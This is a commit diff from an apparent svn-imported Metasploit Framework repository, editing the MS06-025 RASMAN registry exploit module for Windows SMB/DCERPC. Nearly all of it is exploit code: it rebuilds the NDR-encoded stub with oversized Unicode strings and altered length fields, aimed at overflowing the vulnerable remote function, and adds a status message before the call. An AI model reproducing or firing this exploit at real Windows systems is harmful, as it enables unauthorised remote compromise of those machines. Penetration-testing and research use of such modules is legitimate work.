updated for hd

git-svn-id: file:///home/svn/framework3/trunk@3710 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/smb/ms06_025_rasmans_reg.rb

@@ -54,64 +54,60 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
 		print_status("Binding to #{handle}")
 		dcerpc_bind(handle)
 		print_status("Bound to #{handle}")
+            
+        fuxorstring = "G" * 514
+        #fuxorstring = "G" * 212 + "\\\\" + "g" * 42
+        #fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion"
 
         type2 = 
-            NDR.wstring("A" * 34) +      # 34 length
-            NDR.wstring("B" * 258) +     # 258 length
-            NDR.wstring("C" * 258) +     # 258 length
-            NDR.long(1) +
-            NDR.long(1)
+            NDR.UnicodeConformantVaryingString("A" * 16) +         # 34 length, UNMIDL 17
+            NDR.UnicodeConformantVaryingString("B" * 128) +        # 258 length, UNMIDL 129
+            NDR.UnicodeConformantVaryingString("C" * 128) +        # 258 length, UNMIDL 129
+            NDR.long(4) +
+            NDR.long(4) 
        
-            #fuxorstring = "G" * 212 + "\\\\" + "g" * 43
-            #fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion"
-        fuxorstring = "G" * 552 
             
         type1 = 
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
 
-            NDR.long(1) + type2 +                # unique type 2
+            NDR.long(0x45) + type2 +        # Parsed by CallbackListFromRpc
+            NDR.UnicodeConformantVaryingString("D" * 127) +    # 258 length, UNMIDL 129
+            NDR.long(4) +
+            NDR.UnicodeConformantVaryingString("E" * 259) +   # 520 length, UNMIDL 260
+            NDR.UnicodeConformantVaryingString("F" * 259) +   # 520 length, UNMIDL 260
 
-            NDR.wstring("D" * 258) +     # 258 length    
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
+            NDR.long(4) +
 
-            NDR.long(1) +
-
-            NDR.wstring("E" * 520) +     # 520 length
-            #NDR.wstring("F" * 86 + "\\" + "f" * 86 + "\\" + "F" * 86) +     # 260 length
-            NDR.wstring("F" * 520) +     # 520 length
-
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-            NDR.long(1) +
-
-            #NDR.wstring(Rex::Text.pattern_create(257)) +     # 257 length
-            NDR.wstring(fuxorstring) +     # 514 length
+            NDR.UnicodeConformantVaryingString("G" * 256) +   # 514 length, UNMIDL 257
             
-			NDR.long(0) + 
-            NDR.long(0)  
+			NDR.long(4) + 
+            NDR.long(4)  
         
-		stubdata = type1 + NDR.long(1)
-
+		stubdata = type1 + NDR.long(4)
+        print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
 		print_status('Calling the vulnerable function...')
 
 		begin